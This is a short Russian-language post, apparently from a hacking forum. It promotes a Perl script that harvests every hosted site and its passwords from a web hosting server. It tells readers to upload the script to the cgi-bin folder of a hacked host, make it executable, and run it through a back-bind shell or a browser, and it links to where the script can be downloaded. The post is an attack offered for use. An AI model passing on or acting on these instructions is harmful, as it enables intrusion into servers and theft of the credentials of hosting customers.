Нашел скрипт,который собирает на хостинге все хосты и пароли к ним (установленные на этом хостинге). Кидаем на взломан. хост,в папку cgi-bin и через back-bind конект запускаем.(Пробовал через браузер,тоже запускается,то ка права поставь +x) Придуманно супер. Ссылочка: http://lin-web-us.cybertek.co.za/sites/arhive/soft/passwd.pl